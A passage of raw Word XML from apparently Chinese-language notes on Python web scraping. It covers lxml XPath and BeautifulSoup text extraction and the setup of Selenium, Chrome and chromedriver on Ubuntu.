        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B4F6F4" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tree = etree.HTML(html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472D704" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>p_text = tree.xpath('//div[@id="content"]/p[@class="text"]/text()')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF8F44" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00486C04" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E18033C" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">print(p_text)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r w:rsidRPr="00486C04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>['Hello, world!']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A410557" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B76ADDA" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们首先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> etree.HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xpath </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来选取文档中的元素。这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式会选取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "content" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> div </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "text" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F85678" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C19FE00" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你只想使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeautifulSoup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择器来选取元素，这是一个类似的功能。以下是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19BAC7" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151F39F0" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from bs4 import BeautifulSoup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE7743" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623245B1" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>html = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA876E9" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E699CC" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6CFB8" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div id="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BB0EC" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p class="text"&gt;Hello, world!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F0781" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FBB6C" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48961D16" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6C2C3" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA90A6" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121C1A08" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>soup = BeautifulSoup(html, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F63B2" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>p_text = soup.select_one('#content .text').get_text()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4085BE" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRPr="00843475" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C57C14F" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">print(p_text)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r w:rsidRPr="00843475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Hello, world!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9FD421" w14:textId="77777777" w:rsidR="00C6782C" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9898DB" w14:textId="7799ED7F" w:rsidR="00CC45CB" w:rsidRDefault="00C6782C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们首先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> select_one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来选取文档中的元素。这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择器会选取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "content" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> div </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "text" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">get_text </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法用来获取元素的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE128B" w14:textId="77777777" w:rsidR="005B6DDE" w:rsidRDefault="005B6DDE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616526A4" w14:textId="7DEADA42" w:rsidR="00B51AFD" w:rsidRDefault="00B51AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="_Toc159780048"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>elenium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
    </w:p>
    <w:p w14:paraId="06873C19" w14:textId="77777777" w:rsidR="00B51AFD" w:rsidRDefault="00B51AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD3986F" w14:textId="64DF651A" w:rsidR="00B51AFD" w:rsidRDefault="00937025" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00937025">
        <w:t>https://blog.csdn.net/FujLiny/article/details/115387701</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4420A342" w14:textId="77777777" w:rsidR="00B51AFD" w:rsidRDefault="00B51AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B6785B" w14:textId="47438E9A" w:rsidR="00966C9C" w:rsidRPr="00937025" w:rsidRDefault="00966C9C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="616" w:name="_Toc159780049"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sele</w:t>
      </w:r>
      <w:r>
        <w:t>nium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="616"/>
    </w:p>
    <w:p w14:paraId="081D08F3" w14:textId="709FB907" w:rsidR="00B51AFD" w:rsidRDefault="00966C9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00966C9C">
        <w:t>pip install selenium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D8BBE" w14:textId="77777777" w:rsidR="00B51AFD" w:rsidRDefault="00B51AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECA0C7B" w14:textId="4D2E95A3" w:rsidR="00966C9C" w:rsidRDefault="00966C9C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="_Toc159780050"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>buntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
    </w:p>
    <w:p w14:paraId="0372D854" w14:textId="701F4281" w:rsidR="00B51AFD" w:rsidRDefault="00966C9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA58D7E" w14:textId="77777777" w:rsidR="005C7801" w:rsidRDefault="005C7801" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D404366" w14:textId="5D31DFEE" w:rsidR="00B51AFD" w:rsidRDefault="005C7801" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>apt install google-chrome-stable_current_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4942C" w14:textId="77777777" w:rsidR="005C7801" w:rsidRDefault="005C7801" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检验是否安装成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD30C0" w14:textId="5BA550F2" w:rsidR="00B51AFD" w:rsidRDefault="005C7801" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>google-chrome --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CC039" w14:textId="0AF9BB1F" w:rsidR="00B51AFD" w:rsidRDefault="00DA0799" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="618" w:name="_Toc159780051"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:t>driver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w14:paraId="2BF3DC6D" w14:textId="2BF90BD2" w:rsidR="00A82825" w:rsidRDefault="00DA0799" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记住版本号，然后安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:t>driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916EF0C" w14:textId="77777777" w:rsidR="00A82825" w:rsidRDefault="00A82825" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD9F23F" w14:textId="16FBD263" w:rsidR="00CC45CB" w:rsidRDefault="008D0165" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:t>driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载网址：</w:t>
      </w:r>
      <w:r w:rsidRPr="008D7A39">
        <w:t>http://chromedriver.storage.googleapis.com/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59DA96" w14:textId="53F53001" w:rsidR="004878DA" w:rsidRDefault="008D7A39" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D7A39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入网站之后找到跟</w:t>
      </w:r>
      <w:r w:rsidR="004F7F8C">
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="004F7F8C" w:rsidRPr="004F7F8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F7F8C">
        <w:t>google-chrome --version`</w:t>
      </w:r>
      <w:r w:rsidRPr="008D7A39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相近的一个版本</w:t>
      </w:r>
      <w:r w:rsidR="000E74D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891D8AF" w14:textId="77777777" w:rsidR="000E74D4" w:rsidRDefault="000E74D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B7A50C" w14:textId="75907C81" w:rsidR="006D705E" w:rsidRDefault="006D705E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到之后，下载对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3652C6" w14:textId="4CC74F0F" w:rsidR="00621D49" w:rsidRDefault="00337448" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA7A5F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidR="00BA7A5F" w:rsidRPr="00BA7A5F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>http://chromedriver.storage.googleapis.com/89.0.4389.23/chromedriver_linux64.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B65F2ED" w14:textId="77777777" w:rsidR="00BA7A5F" w:rsidRPr="00BA7A5F" w:rsidRDefault="00BA7A5F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
